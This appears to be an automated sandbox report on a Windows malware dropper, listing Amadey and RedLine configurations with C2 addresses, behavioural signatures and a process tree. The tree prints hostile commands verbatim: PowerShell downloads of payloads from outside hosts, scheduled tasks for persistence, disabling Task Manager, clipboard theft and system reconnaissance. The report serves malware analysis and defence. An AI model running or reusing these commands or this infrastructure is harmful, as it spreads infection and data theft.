Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240419-en
  • resource tags

    arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    25-06-2024 13:54

General

  • Target

    c1ed97a3046e79072eedc9e6c3e6f5d91dc33c413e30c2cc8e6d3567fd8eb9a5.exe

  • Size

    1.8MB

  • MD5

    9e78efea36be9183e00cfb55d3eae362

  • SHA1

    96eed79e6f26288793b34f7be1a2d661635f4709

  • SHA256

    c1ed97a3046e79072eedc9e6c3e6f5d91dc33c413e30c2cc8e6d3567fd8eb9a5

  • SHA512

    51f342aae3228f8bcc4d8be25b76c183fe05a80cfd2f3171df886360ef21cd8ca8aea14019109d28433cfe693b2469dea779cee4f4e4b864236d5e67f7bb1fad

  • SSDEEP

    49152:s5jHyPOS5+WrYL2CkAmdUhDfUCdogW+NvCanzg1+M:8yPzUQsnvm48CdoghNKanq+M

Malware Config

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

C2

http://77.91.77.81

Attributes
  • install_dir

    8254624243

  • install_file

    axplong.exe

  • strings_key

    90049e51fabf09df0d6748e0b271922e

  • url_paths

    /Kiru9gu/index.php

rc4.plain

Extracted

Family

redline

Botnet

AMA

C2

185.215.113.67:40960

Extracted

Family

redline

Botnet

LiveTraffic

C2

4.184.236.127:1110

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detects Monster Stealer. 2 IoCs
  • Exela Stealer

    Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.

  • Monster

    Monster is a Golang stealer that was discovered in 2024.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Powershell Invoke Web Request.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 20 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 33 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Embeds OpenSSL 1 IoCs

    Embeds OpenSSL, may be used to circumvent TLS interception.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 49 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c1ed97a3046e79072eedc9e6c3e6f5d91dc33c413e30c2cc8e6d3567fd8eb9a5.exe
    "C:\Users\Admin\AppData\Local\Temp\c1ed97a3046e79072eedc9e6c3e6f5d91dc33c413e30c2cc8e6d3567fd8eb9a5.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:3504
    • C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
      "C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3096
      • C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe
        "C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5096
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.co/1lLub
          4⤵
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:1480
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe50ad3cb8,0x7ffe50ad3cc8,0x7ffe50ad3cd8
            5⤵
              PID:2964
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,6233378344556926978,6363881409778041741,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1776 /prefetch:2
              5⤵
                PID:2056
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,6233378344556926978,6363881409778041741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:2204
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,6233378344556926978,6363881409778041741,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8
                5⤵
                  PID:4612
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,6233378344556926978,6363881409778041741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
                  5⤵
                    PID:2556
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,6233378344556926978,6363881409778041741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
                    5⤵
                      PID:2104
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,6233378344556926978,6363881409778041741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4572 /prefetch:1
                      5⤵
                        PID:1468
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,6233378344556926978,6363881409778041741,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4532 /prefetch:1
                        5⤵
                          PID:904
                        • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,6233378344556926978,6363881409778041741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5332 /prefetch:8
                          5⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4600
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,6233378344556926978,6363881409778041741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
                          5⤵
                            PID:4084
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,6233378344556926978,6363881409778041741,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
                            5⤵
                              PID:1500
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,6233378344556926978,6363881409778041741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 /prefetch:8
                              5⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:1028
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,6233378344556926978,6363881409778041741,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5016 /prefetch:2
                              5⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4448
                          • C:\Users\Admin\AppData\Local\Temp\6.exe
                            "C:\Users\Admin\AppData\Local\Temp\6.exe"
                            4⤵
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3948
                          • C:\Users\Admin\AppData\Local\Temp\7.exe
                            "C:\Users\Admin\AppData\Local\Temp\7.exe"
                            4⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3332
                        • C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious use of WriteProcessMemory
                          PID:1028
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            4⤵
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3744
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 300
                            4⤵
                            • Program crash
                            PID:4480
                        • C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"
                          3⤵
                          • Executes dropped EXE
                          PID:3252
                        • C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
                          3⤵
                          • Executes dropped EXE
                          • Drops file in Windows directory
                          • Suspicious use of WriteProcessMemory
                          PID:1432
                          • C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                            "C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
                            4⤵
                            • Executes dropped EXE
                            PID:1384
                            • C:\Users\Admin\AppData\Local\Temp\1000020001\1.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000020001\1.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks SCSI registry key(s)
                              PID:616
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 616 -s 484
                                6⤵
                                • Program crash
                                PID:2872
                        • C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"
                          3⤵
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Suspicious use of WriteProcessMemory
                          PID:3756
                          • C:\Windows\SYSTEM32\cmd.exe
                            cmd /c ins.bat
                            4⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4148
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
                              5⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:3616
                            • C:\Windows\system32\schtasks.exe
                              schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
                              5⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:916
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
                              5⤵
                              • Blocklisted process makes network request
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:900
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
                              5⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Modifies registry class
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:1876
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat"
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2844
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /create /tn "Cleaner" /tr "C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
                                  7⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:2908
                                • C:\Windows\system32\reg.exe
                                  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
                                  7⤵
                                  • Modifies registry key
                                  PID:3604
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
                                  7⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:4828
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
                                  7⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:3308
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\Admin\AppData\Local\Corporation.zip'"
                              5⤵
                              • Blocklisted process makes network request
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2584
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command "Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Corporation.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Corporation'"
                              5⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5104
                            • C:\Windows\system32\schtasks.exe
                              schtasks /query /TN "Cleaner"
                              5⤵
                                PID:1552
                          • C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe"
                            3⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious use of WriteProcessMemory
                            PID:1352
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              4⤵
                                PID:1192
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1200
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 272
                                4⤵
                                • Program crash
                                PID:332
                            • C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:984
                              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                4⤵
                                  PID:2588
                              • C:\Users\Admin\AppData\Local\Temp\1000101001\judit.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000101001\judit.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:3904
                                • C:\Users\Admin\AppData\Local\Temp\onefile_3904_133637973226900642\stub.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000101001\judit.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  PID:2020
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "ver"
                                    5⤵
                                      PID:1976
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                      5⤵
                                        PID:3892
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic csproduct get uuid
                                          6⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1468
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tasklist"
                                        5⤵
                                          PID:1528
                                          • C:\Windows\system32\tasklist.exe
                                            tasklist
                                            6⤵
                                            • Enumerates processes with tasklist
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:572
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
                                          5⤵
                                          • Hide Artifacts: Hidden Files and Directories
                                          PID:1720
                                          • C:\Windows\system32\attrib.exe
                                            attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
                                            6⤵
                                            • Views/modifies file attributes
                                            PID:3528
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
                                          5⤵
                                            PID:2316
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
                                            5⤵
                                              PID:4696
                                              • C:\Windows\system32\taskkill.exe
                                                taskkill /F /IM chrome.exe
                                                6⤵
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1672
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                              5⤵
                                                PID:3088
                                                • C:\Windows\system32\tasklist.exe
                                                  tasklist /FO LIST
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3056
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                                                5⤵
                                                  PID:3756
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell.exe Get-Clipboard
                                                    6⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1592
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "chcp"
                                                  5⤵
                                                    PID:1196
                                                    • C:\Windows\system32\chcp.com
                                                      chcp
                                                      6⤵
                                                        PID:4204
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "chcp"
                                                      5⤵
                                                        PID:2556
                                                        • C:\Windows\system32\chcp.com
                                                          chcp
                                                          6⤵
                                                            PID:1824
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                                          5⤵
                                                            PID:3536
                                                            • C:\Windows\system32\netsh.exe
                                                              netsh wlan show profiles
                                                              6⤵
                                                              • Event Triggered Execution: Netsh Helper DLL
                                                              PID:4028
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                                                            5⤵
                                                              PID:4220
                                                              • C:\Windows\System32\Conhost.exe
                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                6⤵
                                                                  PID:1528
                                                                • C:\Windows\system32\systeminfo.exe
                                                                  systeminfo
                                                                  6⤵
                                                                  • Gathers system information
                                                                  PID:1052
                                                                • C:\Windows\system32\HOSTNAME.EXE
                                                                  hostname
                                                                  6⤵
                                                                    PID:2772
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic logicaldisk get caption,description,providername
                                                                    6⤵
                                                                    • Collects information from the system
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:5092
                                                                  • C:\Windows\system32\net.exe
                                                                    net user
                                                                    6⤵
                                                                      PID:1392
                                                                      • C:\Windows\system32\net1.exe
                                                                        C:\Windows\system32\net1 user
                                                                        7⤵
                                                                          PID:1848
                                                                      • C:\Windows\system32\query.exe
                                                                        query user
                                                                        6⤵
                                                                          PID:1956
                                                                          • C:\Windows\system32\quser.exe
                                                                            "C:\Windows\system32\quser.exe"
                                                                            7⤵
                                                                              PID:984
                                                                          • C:\Windows\system32\net.exe
                                                                            net localgroup
                                                                            6⤵
                                                                              PID:4000
                                                                              • C:\Windows\system32\net1.exe
                                                                                C:\Windows\system32\net1 localgroup
                                                                                7⤵
                                                                                  PID:4200
                                                                              • C:\Windows\system32\net.exe
                                                                                net localgroup administrators
                                                                                6⤵
                                                                                  PID:2860
                                                                                  • C:\Windows\system32\net1.exe
                                                                                    C:\Windows\system32\net1 localgroup administrators
                                                                                    7⤵
                                                                                      PID:4868
                                                                                  • C:\Windows\system32\net.exe
                                                                                    net user guest
                                                                                    6⤵
                                                                                      PID:1176
                                                                                      • C:\Windows\system32\net1.exe
                                                                                        C:\Windows\system32\net1 user guest
                                                                                        7⤵
                                                                                          PID:3076
                                                                                      • C:\Windows\system32\net.exe
                                                                                        net user administrator
                                                                                        6⤵
                                                                                          PID:2444
                                                                                          • C:\Windows\system32\net1.exe
                                                                                            C:\Windows\system32\net1 user administrator
                                                                                            7⤵
                                                                                              PID:1872
                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                            wmic startup get caption,command
                                                                                            6⤵
                                                                                              PID:3884
                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                              tasklist /svc
                                                                                              6⤵
                                                                                              • Enumerates processes with tasklist
                                                                                              PID:4464
                                                                                            • C:\Windows\system32\ipconfig.exe
                                                                                              ipconfig /all
                                                                                              6⤵
                                                                                              • Gathers network information
                                                                                              PID:2588
                                                                                            • C:\Windows\system32\ROUTE.EXE
                                                                                              route print
                                                                                              6⤵
                                                                                                PID:2672
                                                                                              • C:\Windows\system32\ARP.EXE
                                                                                                arp -a
                                                                                                6⤵
                                                                                                  PID:3936
                                                                                                • C:\Windows\system32\NETSTAT.EXE
                                                                                                  netstat -ano
                                                                                                  6⤵
                                                                                                  • Gathers network information
                                                                                                  PID:2820
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  sc query type= service state= all
                                                                                                  6⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:5104
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh firewall show state
                                                                                                  6⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                  PID:1888
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh firewall show config
                                                                                                  6⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  • Event Triggered Execution: Netsh Helper DLL
